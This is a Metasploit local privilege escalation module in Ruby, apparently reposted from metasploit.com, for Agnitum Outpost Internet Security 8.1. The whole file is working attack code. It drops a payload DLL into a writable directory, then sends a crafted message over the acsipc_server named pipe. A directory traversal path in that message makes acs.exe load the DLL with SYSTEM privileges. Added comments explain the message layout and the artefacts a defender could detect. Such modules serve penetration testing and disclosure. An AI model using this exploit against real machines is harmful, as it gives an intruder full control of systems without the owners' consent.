Agnitum Outpost Internet Security Local Privilege Escalation
来源:metasploit.com 作者:vazquez 发布时间:2013-09-18  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
  
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
  
# Metasploit local privilege escalation module for Agnitum Outpost Internet
# Security 8.1 (details in 'Description' below). It expects a 32-bit Windows
# meterpreter session ('Arch' => ARCH_X86, 'SessionTypes' => meterpreter);
# every Win32 call goes through railgun.
#
# Flow: open \\.\pipe\acsipc_server -> drop a payload DLL into a writable
# directory -> send acs.exe a message whose DLL path walks out of its own
# install directory (DEPTH x "..\") to the dropped file -> acs.exe, running
# as SYSTEM, loads it.
#
# Defender's view: the observable artefacts are a process other than the
# Agnitum service opening the acsipc_server named pipe, and a freshly
# written DLL under %TEMP% (or WritableDir) being loaded by acs.exe.
class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking
  
  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Exploit::FileDropper
  
  # Module metadata and user options.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Agnitum Outpost Internet Security Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
        Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load
        load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
        code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with
        Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ahmad Moghimi', # Vulnerability discovery
          'juan vazquez' # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Agnitum Outpost Internet Security 8.1', { } ],
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'OSVDB', '96208' ],
          [ 'EDB', '27282' ],
          [ 'URL', 'http://mallocat.com/a-journey-to-antivirus-escalation/' ]
        ],
      'DisclosureDate' => 'Aug 02 2013',
      'DefaultTarget'  => 0
    }))
  
    register_options([
      # OptString rather than OptPath: this is a path on the *remote* host,
      # so it must not be validated against the local filesystem.
      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
      # DEPTH = number of "..\" components prepended to the DLL path in
      # write_named_pipe, i.e. how far acs.exe's working directory is below
      # the drive root. By default acs.exe lives on
      # C:\Program Files\Agnitum\Outpost Security Suite Pro\ (three levels),
      # hence the default of 3.
      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
    ], self.class)
  
  
  end
  
  # Four random alphabetic bytes read as one little-endian 32-bit integer
  # ("V"). Used only as a filler dword in the pipe message.
  #
  # @return [Integer] random 32-bit value
  def junk
    return rand_text_alpha(4).unpack("V").first
  end
  
  # Opens a named pipe read/write with kernel32!CreateFileA via railgun.
  #
  # Share mode 0x3 is FILE_SHARE_READ | FILE_SHARE_WRITE. The failure check
  # compares against the 32-bit INVALID_HANDLE_VALUE (0xFFFFFFFF), which is
  # consistent with this module targeting ARCH_X86 sessions only.
  #
  # @param pipe [String] pipe path, e.g. "\\\\.\\pipe\\acsipc_server"
  # @return [Integer, nil] raw HANDLE, or nil when CreateFileA fails
  def open_named_pipe(pipe)
    invalid_handle_value = 0xFFFFFFFF
  
    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)
  
    handle = r['return']
  
    if handle == invalid_handle_value
      return nil
    end
  
    return handle
  end
  
  # Builds the acsipc_server message carrying the DLL path and writes it to
  # the pipe with kernel32!WriteFile.
  #
  # The absolute drop path is turned into a relative traversal: DEPTH x "..\",
  # then the path with its drive-letter prefix ("C:\") stripped, then the
  # file name. The result is converted to UTF-16LE (Rex::Text.to_unicode)
  # before being embedded.
  #
  # Message layout (all dwords little-endian):
  #   16-byte GUID | command 0x17 | junk dword | data length | 3 zero dwords | data
  # where data = 0x11 NUL bytes, the UTF-16 path, and 5 trailing NUL bytes.
  #
  # @param handle [Integer] open pipe HANDLE from open_named_pipe
  # @param dll_path [String] absolute remote directory holding the DLL
  # @param dll_name [String] file name of the dropped DLL
  # @return [Integer, nil] bytes written, or nil when WriteFile returns false
  def write_named_pipe(handle, dll_path, dll_name)
  
    traversal_path = "..\\" * datastore["DEPTH"]
    traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")
    traversal_path << "\\#{dll_name}"
  
    path = Rex::Text.to_unicode(traversal_path)
  
    data = "\x00" * 0x11
    data << path
    data << "\x00\x00"
    data << "\x00\x00\x00"
  
    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
    buf << [0x17].pack("V") # command
    buf << [junk].pack("V")
    buf << [data.length].pack("V")
    buf << [0, 0, 0].pack("V*")
    buf << data
  
    # The trailing 4 is presumably the size railgun allocates for the
    # lpNumberOfBytesWritten out-parameter (a DWORD) -- verify against the
    # railgun kernel32 definition.
    w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)
  
    # NOTE(review): this failure is a named-pipe write, not a disk write,
    # although the message says otherwise.
    if w['return'] == false
      print_error("The was an error writing to disk, check permissions")
      return nil
    end
  
    return w['lpNumberOfBytesWritten']
  end
  
  
  # Presence check only: reports Detected when the acsipc_server pipe can be
  # opened and Safe otherwise. It never returns Vulnerable, because opening
  # the pipe says nothing about the installed version. The handle is closed
  # before returning.
  #
  # @return [Exploit::CheckCode] Safe or Detected
  def check
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
    if handle.nil?
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Detected
  end
  
  # Runs the attack: open the pipe, pick and enter the drop directory, write
  # the payload DLL, send the traversal message, close the pipe.
  #
  # Every fail_with after the pipe is opened closes the handle first. The DLL
  # is registered with FileDropper so the framework removes it on session
  # cleanup (NOTE(review): if acs.exe keeps the DLL loaded, that deletion may
  # not succeed -- cannot be confirmed from this file).
  #
  # @raise via fail_with on missing pipe (NoTarget), unusable directory or
  #   failed drop (Config), or failed pipe write (Unknown)
  def exploit
  
    temp_dir = ""
  
    print_status("Opening named pipe...")
    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
    if handle.nil?
      fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")
    else
      print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")
    end
  
    # WritableDir wins when set and non-empty; otherwise %TEMP% is expanded
    # on the remote host.
    if datastore["WritableDir"] and not datastore["WritableDir"].empty?
      temp_dir = datastore["WritableDir"]
    else
      temp_dir = expand_path("%TEMP%")
    end
  
    print_status("Using #{temp_dir} to drop malicious DLL...")
    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
    end
  
    print_status("Writing malicious DLL to remote filesystem")
    # pwd is read back after cd so the absolute path handed to
    # write_named_pipe is the directory actually in use, not the raw option.
    write_path = pwd
    # Random 10-19 character alphabetic name.
    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
    begin
      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
      write_file(dll_name, generate_payload_dll)
      register_file_for_cleanup("#{write_path}\\#{dll_name}")
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
    end
  
    print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")
    bytes = write_named_pipe(handle, write_path, dll_name)
    # The handle is closed unconditionally here, before the result is checked.
    session.railgun.kernel32.CloseHandle(handle)
  
    if bytes.nil?
      fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")
    end
  
  end
  
end

 